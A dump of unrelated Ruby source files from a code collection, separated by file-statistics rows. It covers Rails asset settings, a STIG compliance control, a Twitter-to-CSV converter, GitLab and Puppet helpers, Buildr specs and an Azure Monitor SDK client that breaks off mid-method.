Rails.application.config.assets.version = '1.0'

# Add additional assets to the asset load path.
# Rails.application.config.assets.paths << Emoji.images_path

# Add Yarn node_modules folder to the asset load path.
Rails.application.config.assets.paths << Rails.root.join('node_modules')

# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in the app/assets
# folder are already added.
# Rails.application.config.assets.precompile += %w( admin.js admin.css )
Rails.application.config.assets.precompile << 'roller.js'
Rails.application.config.assets.precompile << 'gm.js'
# Bug fix: the previous code appended 'fontawesome/' + /\.(?:svg|eot|woff2?|ttf)\z/.to_s,
# i.e. the literal STRING "fontawesome/(?-mix:\.(?:svg|eot|woff2?|ttf)\z)", which can
# never match an asset logical path. Sprockets accepts Regexp matchers, so use one
# that matches font files under fontawesome/.
Rails.application.config.assets.precompile << %r{\Afontawesome/.*\.(?:svg|eot|woff2?|ttf)\z}
| 46.611111 | 96 | 0.764005 |
918534d9e3c46e2306fc7ba8c6067ae1a3a60b99 | 396 | require "serverkit/resources/base"
module Serverkit
  module Resources
    # Resource ensuring that the system service named by +name+ is running.
    # Both actions delegate to backend commands resolved by identifier
    # (provided by Base / the included command layer).
    class Service < Base
      # Service name, e.g. "nginx" (required).
      attribute :name, required: true, type: String

      # @note Override
      # Starts the service.
      def apply
        run_command_from_identifier(:start_service, name)
      end

      # @note Override
      # Runs the "is the service running?" check for +name+.
      def check
        check_command_from_identifier(:check_service_is_running, name)
      end
    end
  end
end
| 19.8 | 70 | 0.671717 |
3875db1ff4b0cbc8221a2ee478907faa058d60af | 103 | require 'rails_helper'
# Smoke spec: verifies the RSpec/Rails test harness itself is wired up.
describe 'the test' do
  it 'is a success' do
    expect(1).to eq(1)
  end
end
| 12.875 | 22 | 0.660194 |
918e96202d88c059d38f40a4c5862d45f4fd624e | 651 | cask "keep-it" do
version "1.9.3"
sha256 "803afba6a2c178d59c39f80244875009e6605d8b6c75a609f9cb1fa85f38b476"
url "https://reinventedsoftware.com/keepit/downloads/KeepIt_#{version}.dmg"
appcast "https://reinventedsoftware.com/keepit/downloads/keepit.xml"
name "Keep It"
desc "Notebook, scrapbook and organizer tool"
homepage "https://reinventedsoftware.com/keepit/"
auto_updates true
depends_on macos: ">= :catalina"
app "Keep It.app"
zap trash: [
"~/Library/Containers/com.reinvented.Keep-It-Indexing",
"~/Library/Containers/com.reinvented.Keep-It-Metadata",
"~/Library/Containers/com.reinvented.Keep It",
]
end
| 29.590909 | 77 | 0.741935 |
d58b953333c170259390568aa48f2163147dafbe | 1,211 | control "PHTN-10-000095" do
title "The Photon operating system must be configured so that the x86
Ctrl-Alt-Delete key sequence is disabled on the command line."
desc "When the Ctrl-Alt-Del target is enabled, locally logged-on user who
presses Ctrl-Alt-Delete, when at the console, can reboot the system. If
accidentally pressed, as could happen in the case of a mixed OS environment,
this can create the risk of short-term loss of availability of systems due to
unintentional reboot. "
impact 0.5
tag severity: "CAT II"
tag gtitle: "SRG-OS-000480-GPOS-00227"
tag gid: nil
tag rid: "PHTN-10-000095"
tag stig_id: "PHTN-10-000095"
tag cci: "CCI-000366"
tag nist: ["CM-6 b", "Rev_4"]
desc 'check', "At the command line, execute the following command:
# systemctl status ctrl-alt-del.target
Expected result:
ctrl-alt-del.target
Loaded: masked (/dev/null; bad)
Active: inactive (dead)
If the output does not match the expected result, this is a finding"
desc 'fix', "At the command line, execute the following command:
# systemctl mask ctrl-alt-del.target"
describe systemd_service('ctrl-alt-del.target') do
it { should_not be_enabled}
it { should_not be_running}
end
end
| 31.051282 | 77 | 0.738233 |
f71d74d3bb308420571664385faf9f139a4361d8 | 5,755 | # encoding: utf-8
module CartoDB
  module TwitterSearch

    # Converts arrays of Twitter/Gnip activity items (Hashes with symbol keys)
    # into CSV text: RFC 4180 quoting, comma-separated columns, rows joined
    # with "\n".
    class JSONToCSVConverter

      # Top-level item fields that map one-to-one onto a CSV column.
      INDIVIDUAL_FIELDS = [
        :link,
        :body,
        :objectType,
        :postedTime,
        :favoritesCount,
        :twitter_lang,
        :retweetCount
      ].freeze

      # Nested fields: expanded into "<field>_<subfield>" columns when listed
      # in SUBFIELDS, otherwise serialized into a single JSON-string column.
      GROUP_FIELDS = [
        :actor,
        :inReplyTo,
        :geo,
        :twitter_entities, # saved as a JSON string
        :location
      ].freeze

      # Subfields whose values are themselves structured, so they get dumped
      # as JSON strings instead of being written verbatim.
      SUBGROUP_FIELDS_TO_DUMP = {
        actor: [
          :links,     # links[0].href
          :location,  # may be a Twitter Place (displayName/objectType) or a plain String
          :languages  # languages[0]
        ],
        # If this column were renamed to the_geom, CartoDB would import it as
        # a bounding box; the point geometry goes to the the_geom column
        # instead (see CARTODB_FIELDS), which takes priority on import.
        location: [
          :geo
        ]
      }.freeze

      # Group fields expanded into "<field>_<subfield>" columns. Group fields
      # absent from this map are saved as a stringified JSON blob.
      SUBFIELDS = {
        actor: [
          :id,
          :displayName,
          :image,
          :summary,
          :postedTime,
          :location,
          :utcOffset,
          :preferredUsername,
          :friendsCount,
          :followersCount,
          :listedCount,
          :statusesCount,
          :verified
        ],
        inReplyTo: [
          :link
        ],
        location: [
          :geo,
          :name
        ]
      }.freeze

      # Extra computed columns appended after all input-derived columns.
      CARTODB_FIELDS = [
        :the_geom
      ].freeze

      # Returns the CSV header row ('the_geom' is added automatically).
      #
      # @param additional_fields [Hash] extra column-name => value pairs
      # @return [String] a single CSV line of column names
      def generate_headers(additional_fields = {})
        process([], true, additional_fields)
      end

      # Converts items into CSV text. Note: 'the_geom' is added automatically,
      # no need to pass it as an additional field.
      #
      # @param input_data [Array<Hash>] activity items (symbol keys)
      # @param add_headers [Boolean] prepend the header row when true
      # @param additional_fields [Hash] extra columns, same value on every row
      # @return [String] CSV rows joined with "\n"
      def process(input_data, add_headers = true, additional_fields = {})
        rows = []
        rows << header_row(additional_fields).join(',') if add_headers
        input_data.each { |item| rows << data_row(item, additional_fields).join(',') }
        rows.join("\n")
      end

      # Strips escaped line breaks so each record stays on one CSV line.
      # NOTE: replaces the literal two-character sequences "\n" and "\r", not
      # real newline characters; called on whole payloads before field-level
      # parsing to speed things up.
      def clean_string(contents)
        contents.gsub("\\n", ' ').gsub("\\r", ' ')
      end

      private

      # Builds the list of (already CSV-escaped) column names.
      def header_row(additional_fields)
        row = INDIVIDUAL_FIELDS.map { |field| field_to_csv(field) }
        GROUP_FIELDS.each do |field|
          subfields = SUBFIELDS[field]
          if subfields.nil?
            row << field_to_csv(field)
          else
            subfields.each { |subfield| row << field_to_csv("#{field}_#{subfield}") }
          end
        end
        CARTODB_FIELDS.each { |field| row << field_to_csv(field) }
        additional_fields.each_key { |key| row << field_to_csv(key) }
        row
      end

      # Builds the list of CSV-escaped values for one item; absent values
      # become nil, which render as empty columns after join(',').
      def data_row(item, additional_fields)
        row = INDIVIDUAL_FIELDS.map do |field|
          item[field].nil? ? nil : field_to_csv(item[field])
        end
        GROUP_FIELDS.each do |field|
          subfields = SUBFIELDS[field]
          if subfields.nil?
            # No subfield expansion defined: dump the whole group as JSON.
            row << (item[field].nil? ? nil : field_to_csv(::JSON.dump(item[field])))
          else
            subfields.each do |subfield|
              value = item[field].nil? ? nil : item[field][subfield]
              if value.nil?
                row << nil
              elsif (SUBGROUP_FIELDS_TO_DUMP[field] || []).include?(subfield)
                row << field_to_csv(::JSON.dump(value))
              else
                row << field_to_csv(value)
              end
            end
          end
        end
        CARTODB_FIELDS.each do |field|
          row << field_to_csv(calculate_the_geom(item)) if field == :the_geom
        end
        additional_fields.each_value { |value| row << field_to_csv(value) }
        row
      end

      # Escapes one value per RFC 4180 (wrap in quotes, double inner quotes);
      # additionally flattens backslashes, CR and LF to spaces and drops NULs
      # so a value can never break row/field structure downstream.
      def field_to_csv(field)
        '"' + field.to_s.gsub('"', '""').gsub("\\", ' ').gsub("\x0D", ' ').gsub("\x0A", ' ').gsub("\0", '') + '"'
      end

      # Returns a GeoJSON point for the item as a JSON string, or nil.
      #
      # Twitter/Gnip bug: the item's own :geo carries a (lat, lon) point, so
      # its coordinates are swapped to proper GeoJSON (lon, lat) order here.
      # This only happens for :geo — location geo, bounding boxes and the
      # geo-enrichment payload are already correct. Falls back to the first
      # point found under gnip -> profileLocations.
      #
      # Fix over the previous implementation: the caller's input hash is no
      # longer mutated when swapping the coordinates.
      def calculate_the_geom(row)
        geo = row[:geo]
        if !geo.nil? && !geo.empty?
          lat, lon = geo[:coordinates]
          return ::JSON.dump(geo.merge(coordinates: [lon, lat]))
        end

        gnip = row[:gnip]
        return nil if gnip.nil? || gnip.empty?
        locations = gnip[:profileLocations]
        return nil if locations.nil? || locations.empty?

        # Keep only the first point found, as before.
        locations.each do |location|
          loc_geo = location[:geo]
          next if loc_geo.nil? || loc_geo.empty?
          return ::JSON.dump(loc_geo) if loc_geo[:type] == 'point'
        end
        nil
      end
    end
  end
end
| 29.512821 | 115 | 0.520938 |
6a053e35669f67c895664e2fd3b28a207b1865bf | 123 | require "spec_helper"
# Sanity spec: the gem must expose a non-nil VERSION constant.
describe Watsi do
  it "has a version number" do
    expect(Watsi::VERSION).not_to be nil
  end
end
| 15.375 | 40 | 0.723577 |
6127290e9ce3d787eaa672968fef089211ff29c9 | 784 | require "reflexive/routing_helpers"
# Monkey-patch: every bound Method can report its URL in the Reflexive app.
class Method
  def reflexive_url
    # A Class receiver means a class-level method; otherwise link the
    # receiver's class at instance level.
    level = receiver.instance_of?(Class) ? :class : :instance
    klass = receiver.instance_of?(Class) ? receiver : receiver.class
    Reflexive::Application.default_url_prefix +
      Reflexive::RoutingHelpers.new_method_path(klass, level, name)
  end
end
# Monkey-patch: unbound methods have no receiver, so the URL always points at
# the owner's instance-level entry.
class UnboundMethod
  def reflexive_url
    Reflexive::Application.default_url_prefix +
      Reflexive::RoutingHelpers.new_method_path(owner, :instance, name)
  end
end
# Monkey-patch: classes link to their constant page in the Reflexive app.
# NOTE(review): identical to the Module patch below; since Class < Module this
# override looks redundant — confirm before removing.
class Class
  def reflexive_url
    Reflexive::Application.default_url_prefix +
      Reflexive::RoutingHelpers.constant_path(self)
  end
end
# Monkey-patch: modules link to their constant page in the Reflexive app.
class Module
  def reflexive_url
    Reflexive::Application.default_url_prefix +
      Reflexive::RoutingHelpers.constant_path(self)
  end
end | 25.290323 | 71 | 0.765306 |
6a7b24421c91ae0bc03171a295729a7ce2460e74 | 1,068 | # frozen_string_literal: true
module Gitlab
  module ImportExport
    module Project
      # Shared scaffolding for the project import/export rake-task runners:
      # resolves the target namespace and acting user from the supplied
      # options, and wires up logging plus optional performance measurement.
      class BaseTask
        include Gitlab::WithRequestStore

        # @param opts [Hash] required keys: :project_path, :file_path,
        #   :namespace_path, :username, :measurement_enabled
        # @param logger [Logger] destination for progress/error messages
        def initialize(opts, logger: Logger.new($stdout))
          @logger = logger
          @project_path = opts.fetch(:project_path)
          @file_path = opts.fetch(:file_path)
          @namespace = Namespace.find_by_full_path(opts.fetch(:namespace_path))
          @current_user = User.find_by_username(opts.fetch(:username))
          @measurement_enabled = opts.fetch(:measurement_enabled)
          @measurement = Gitlab::Utils::Measuring.new(logger: logger) if measurement_enabled?
        end

        private

        attr_reader :measurement, :project, :namespace, :current_user, :file_path, :project_path, :logger

        # Whether timing/memory measurement was requested via the options.
        def measurement_enabled?
          @measurement_enabled
        end

        # Logs +msg+ at info level; returns true so it can be a task result.
        def success(msg)
          @logger.info(msg)
          true
        end

        # Logs +msg+ at error level; returns false so it can be a task result.
        def error(msg)
          @logger.error(msg)
          false
        end
      end
    end
  end
end
| 25.428571 | 105 | 0.623596 |
0162e8327ee77748e63224c05bcba783ea7d26ee | 1,205 | #
# hash.rb
#
module Puppet::Parser::Functions
  # Legacy 3.x-style parser function: converts a flat key/value array into a
  # Hash. Superseded by the Puppet 4+ type-system conversion Hash(...).
  newfunction(:hash, :type => :rvalue, :doc => <<-DOC
    This function converts an array into a hash.
    *Examples:*
        hash(['a',1,'b',2,'c',3])
    Would return: {'a'=>1,'b'=>2,'c'=>3}
    Note: Since Puppet 5.0.0 type conversions can in general be performed by using the Puppet Type System.
    See the function new() in Puppet for a wide range of available type conversions.
    This example shows the equivalent expression in the Puppet language:
      Hash(['a',1,'b',2,'c',3])
      Hash([['a',1],['b',2],['c',3]])
  DOC
  ) do |arguments|
    if arguments.empty?
      raise(Puppet::ParseError, "hash(): Wrong number of arguments given (#{arguments.size} for 1)")
    end

    array = arguments[0]
    raise(Puppet::ParseError, 'hash(): Requires array to work with') unless array.is_a?(Array)

    begin
      # Flatten first for compatibility with older Rubies; Hash[] then pairs
      # the elements up as key, value, key, value, ...
      Hash[*array.flatten]
    rescue StandardError
      raise(Puppet::ParseError, 'hash(): Unable to compute hash from array given')
    end
  end
end
# vim: set ts=2 sw=2 et :
| 26.195652 | 118 | 0.618257 |
fff4213dbe938df1e638027a015b33a041b6dd39 | 134 | set :application, 'DMPHub_Stage_x2'
# Single staging host carrying the web, app and db roles, deployed as 'dmp'.
server 'uc3-dmphub02x2-stg.cdlib.org', user: 'dmp', roles: %w[web app db]
# Rails boots with RAILS_ENV=stage on this stage.
set :rails_env, 'stage'
| 33.5 | 73 | 0.723881 |
187e0b98c9948c47b713317e9900744ef47e9e7a | 230 | class MarketSell < ActiveRecord::Base
belongs_to :item
belongs_to :base
validates :quantity, numericality: {only_integer: true}
validates :price, numericality: true
def to_s
"#{quantity} x #{item} @ #{self.base}"
end
end
| 20.909091 | 56 | 0.730435 |
333fa3f01abb5f1ed0e8fc209106e324211257fc | 11,421 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with this
# work for additional information regarding copyright ownership. The ASF
# licenses this file to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
require File.expand_path(File.join(File.dirname(__FILE__), '..', 'spec_helpers'))
# Builds throw-away Eclipse PDE project fixtures on disk (MANIFEST.MF,
# .project, .classpath, plugin.xml, build.properties) for the
# Buildr::Generate.from_eclipse specs below.
module EclipseHelper
  # Creates an Eclipse plugin project under "<group>/<projectName>".
  #
  # Options:
  #   :symName  - Bundle-SymbolicName to write (defaults to the basename of projectName)
  #   :requires - plugin id referenced via a Require-Bundle manifest header
  def setupExample(group, projectName, options = {})
    # Fix: previously an assignment buried inside a ternary
    # ("cond ? symName = a :symName = b"), relying on an ambiguous
    # ":symName =" parse; `||` expresses the same default cleanly.
    symName = options[:symName] || File.basename(projectName)
    requiredPlugins =
      if options[:requires]
        "Require-Bundle: #{options[:requires]};bundle-version=\"1.1.0\",\n"
      end
    write "#{group}/#{projectName}/META-INF/MANIFEST.MF", <<-MANIFEST
Manifest-Version: 1.0
Name: #{projectName}
Bundle-Version: 1.1
Specification-Title: "Examples for #{File.basename(projectName)}"
Specification-Version: "1.0"
Specification-Vendor: "Acme Corp.".
Implementation-Title: "#{File.basename(projectName)}"
Implementation-Version: "build57"
Implementation-Vendor: "Acme Corp."
Bundle-SymbolicName: #{symName}
#{requiredPlugins}
MANIFEST
    write "#{group}/#{projectName}/.project", <<-DOT_PROJECT
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
 <name>#{File.basename(projectName)}</name>
 <comment></comment>
 <projects>
 </projects>
 <buildSpec>
  <buildCommand>
   <name>org.eclipse.jdt.core.javabuilder</name>
   <arguments>
   </arguments>
  </buildCommand>
  <buildCommand>
   <name>org.eclipse.pde.ManifestBuilder</name>
   <arguments>
   </arguments>
  </buildCommand>
  <buildCommand>
   <name>org.eclipse.pde.SchemaBuilder</name>
   <arguments>
   </arguments>
  </buildCommand>
 </buildSpec>
 <natures>
  <nature>org.eclipse.pde.PluginNature</nature>
  <nature>org.eclipse.jdt.core.javanature</nature>
 </natures>
</projectDescription>
DOT_PROJECT
    write "#{group}/#{projectName}/.classpath", <<-DOT_CLASSPATH
<?xml version="1.0" encoding="UTF-8"?>
<classpath>
 <classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.6"/>
 <classpathentry kind="con" path="org.eclipse.pde.core.requiredPlugins"/>
 <classpathentry kind="src" path="src"/>
 <classpathentry combineaccessrules="false" kind="src" path="/another.plugin"/>
 <classpathentry kind="output" path="bin"/>
</classpath>
DOT_CLASSPATH
    write "#{group}/#{projectName}/plugin.xml", <<-PLUGIN_XML
<?xml version="1.0" encoding="UTF-8"?>
<?eclipse version="3.0"?>
<plugin>
<!--some comment
-->
</plugin>
PLUGIN_XML
    write "#{group}/#{projectName}/build.properties", <<-BUILD_PROPERTIES
source.. = src/
output.. = bin/
javacDefaultEncoding.. = UTF-8
bin.includes = META-INF/,\\
.,\\
plugin.xml,\\
rsc/,
BUILD_PROPERTIES
  end
end
describe Buildr::Generate do
include EclipseHelper
describe 'it should find a single eclipse project' do
top = "top_#{__LINE__}"
before do
setupExample(top, 'single')
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
end
it 'should create a valid buildfile' do
define('first')
File.exists?(File.join(top, 'single', '.project')).should be_true
File.exists?(File.join(top, '.project')).should be_false
File.exists?('.project').should be_false
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain("GROUP = \"#{top}\"")
lambda { Buildr.application.run }.should_not raise_error
end
it "should not add project if the corresponding .project file is not an eclipse project" do
buildFile = File.join(top, 'buildfile')
FileUtils.rm(buildFile)
write File.join(top, 'myproject', '.project'), '# Dummy file'
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
file(buildFile).should exist
file(buildFile).should contain('define "single"')
file(buildFile).should_not contain('define "myproject"')
lambda { Buildr.application.run }.should_not raise_error
end
it 'should honour Bundle-Version in MANIFEST.MF' do
define('bundle_version')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define "single"')
file(buildFile).should contain('define "single", :version => "1.1"')
lambda { Buildr.application.run }.should_not raise_error
end
it "should pass source in build.properties to layout[:source, :main, :java] and layout[:source, :main, :scala]" do
define('layout_source')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define')
file(buildFile).should contain('define "single"')
file(buildFile).should contain('layout[:source, :main, :java]')
file(buildFile).should contain('layout[:source, :main, :scala]')
lambda { Buildr.application.run }.should_not raise_error
end
it "should pass output in build.properties to layout[:target, :main], etc" do
define('layout_target')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define')
file(buildFile).should contain('define "single"')
file(buildFile).should contain('layout[:target, :main]')
file(buildFile).should contain('layout[:target, :main, :java]')
file(buildFile).should contain('layout[:target, :main, :scala]')
lambda { Buildr.application.run }.should_not raise_error
end
it "should package an eclipse plugin" do
define('layout_target')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define')
file(buildFile).should contain('package(:jar)')
lambda { Buildr.application.run }.should_not raise_error
end
end
describe 'it should check for a SymbolicName in MANIFEST.MF' do
top = "top_#{__LINE__}"
before do
setupExample(top, 'single', { :symName => 'singleSymbolicName'} )
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
end
it "should set the project name to the SymbolicName from the MANIFEST.MF" do
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define "singleSymbolicName"')
lambda { Buildr.application.run }.should_not raise_error
end
end
describe 'it should accecpt singleton SymbolicName in MANIFEST.MF' do
top = "top_#{__LINE__}"
before do
setupExample(top, 'single', { :symName => 'singleSymbolicName;singleton:=true'})
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
end
it "should not get confused if SymbolicName in MANIFEST.MF is a singleton:=true" do
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define "singleSymbolicName"')
lambda { Buildr.application.run }.should_not raise_error
end
end
describe 'it should find an eclipse project deep' do
top = "top_#{__LINE__}"
before do
setupExample(top, 'nested/single')
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
end
it 'should create a valid buildfile for a nested project' do
setupExample(top, 'single')
define('nested/second')
File.exists?(File.join(top, 'single', '.project')).should be_true
File.exists?(File.join(top, '.project')).should be_false
File.exists?('.project').should be_false
buildFile = File.join(top, 'buildfile')
file(buildFile).should contain("GROUP = \"#{top}\"")
file(buildFile).should contain('define "single"')
lambda { Buildr.application.run }.should_not raise_error
end
it "should correct the path for a nested plugin" do
define('base_dir')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define "single"')
file(buildFile).should contain('define "single", :version => "1.1", :base_dir => "nested/single"')
lambda { Buildr.application.run }.should_not raise_error
end
end
describe 'it should detect dependencies between projects' do
top = "top_#{__LINE__}"
before do
setupExample(top, 'first')
write(File.join(top, 'first', 'src','org','demo','Demo.java'))
write(File.join(top, 'first', 'rsc','aResource.txt'))
setupExample(top, 'second', { :requires => 'first'} )
write(File.join(top, 'second', 'src','org','second','Demo.java'))
setupExample(top, 'aFragment', { :fragment_host => 'second'})
write(File.join(top, 'aFragment', 'fragment.xml'))
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
end
it 'should add "compile.with dependencies" in MANIFEST.MF' do
define('base_dir')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('compile.with dependencies')
file(buildFile).should contain('resources')
lambda { Buildr.application.run }.should_not raise_error
end
#dependencies << projects("first")
it 'should honour Require-Bundle in MANIFEST.MF' do
define('base_dir')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain(/define "second"/)
file(buildFile).should contain( /dependencies << projects\("first"\)/)
file(buildFile).should contain(/define "second".*do.*dependencies << projects\("first"\).* end/m)
lambda { Buildr.application.run }.should_not raise_error
end
# Fragments are only supported with buildr4osi which is not (yet?) part of buildr
it 'should skip fragments.' do
define('base_dir')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
# system("cat #{buildFile}") # if $VERBOSE
file(buildFile).should contain('define "first"')
lambda { Buildr.application.run }.should_not raise_error
end
end
end
| 40.644128 | 152 | 0.655722 |
f8c8c3e4e8c55c33eea55bc05e683e335c396b1b | 1,438 | module AttachmentsHelper
def default_url_options
{ host: Plek.new.website_root, protocol: "https" }
end
def previewable?(attachment)
attachment.csv? && attachment.attachable.is_a?(Edition)
end
# Until we have sensible (resourceful) routing for serving attachments, this method
# provides a convenient shorthand for generating a path for attachment preview.
def preview_path_for_attachment(attachment)
csv_preview_path(id: attachment.attachment_data.id, file: attachment.filename_without_extension, extension: attachment.file_extension)
end
def participating_in_accessible_format_request_pilot?(contact_email)
# A small number of organisations are taking part in a pilot scheme for accessible
# format requests to be submitted by a form rather than a direct email
pilot_addresses = GovukPublishingComponents::Presenters::Attachment::EMAILS_IN_ACCESSIBLE_FORMAT_REQUEST_PILOT
pilot_addresses.include?(contact_email)
end
def block_attachments(attachments = [],
alternative_format_contact_email = nil,
published_on = nil)
attachments.collect do |attachment|
render(
partial: "documents/attachment",
formats: :html,
object: attachment,
locals: {
alternative_format_contact_email: alternative_format_contact_email,
published_on: published_on,
},
)
end
end
end
| 36.871795 | 138 | 0.729485 |
1a5ea6e7702ed89c3ee7b7aae9e4cadc19853411 | 219 | class CreateComments < ActiveRecord::Migration[6.0]
def change
create_table :comments do |t|
t.integer :user_id
t.integer :development_id
t.string :body
t.integer :rating
end
end
end
| 19.909091 | 51 | 0.6621 |
9155d4f3df1e835fcfbb9acf6318f3532ec81299 | 39 | module Cleaner
VERSION = "0.0.7"
end
| 9.75 | 19 | 0.666667 |
3916c67d62495ff57db045f936be8a61ff3193f7 | 248 | # frozen_string_literal: true
class CreateTeams < ActiveRecord::Migration[7.0]
  # Adds the teams table. permissions is a non-null text column defaulting to
  # the empty string (presumably a serialized list — confirm against the model).
  def change
    create_table :teams do |t|
      t.string :name, null: false
      t.text :permissions, null: false, default: ""
      t.timestamps
    end
  end
end
| 19.076923 | 51 | 0.665323 |
ab72d865f324c312df71a75f964bcdbe0967b68b | 8,659 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Monitor::Mgmt::V2017_05_01_preview
#
# Monitor Management Client
#
class DiagnosticSettingsCategoryOperations
include MsRestAzure
#
# Creates and initializes a new instance of the DiagnosticSettingsCategoryOperations class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [MonitorManagementClient] reference to the MonitorManagementClient
attr_reader :client
#
# Gets the diagnostic settings category for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param name [String] The name of the diagnostic setting.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DiagnosticSettingsCategoryResource] operation results.
#
def get(resource_uri, name, custom_headers:nil)
response = get_async(resource_uri, name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the diagnostic settings category for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param name [String] The name of the diagnostic setting.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(resource_uri, name, custom_headers:nil)
get_async(resource_uri, name, custom_headers:custom_headers).value!
end
#
# Gets the diagnostic settings category for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param name [String] The name of the diagnostic setting.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(resource_uri, name, custom_headers:nil)
fail ArgumentError, 'resource_uri is nil' if resource_uri.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, 'name is nil' if name.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{resourceUri}/providers/microsoft.insights/diagnosticSettingsCategories/{name}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'name' => name},
skip_encoding_path_params: {'resourceUri' => resource_uri},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Monitor::Mgmt::V2017_05_01_preview::Models::DiagnosticSettingsCategoryResource.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists the diagnostic settings categories for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DiagnosticSettingsCategoryResourceCollection] operation results.
#
def list(resource_uri, custom_headers:nil)
response = list_async(resource_uri, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Lists the diagnostic settings categories for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(resource_uri, custom_headers:nil)
list_async(resource_uri, custom_headers:custom_headers).value!
end
#
# Lists the diagnostic settings categories for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(resource_uri, custom_headers:nil)
fail ArgumentError, 'resource_uri is nil' if resource_uri.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{resourceUri}/providers/microsoft.insights/diagnosticSettingsCategories'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'resourceUri' => resource_uri},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
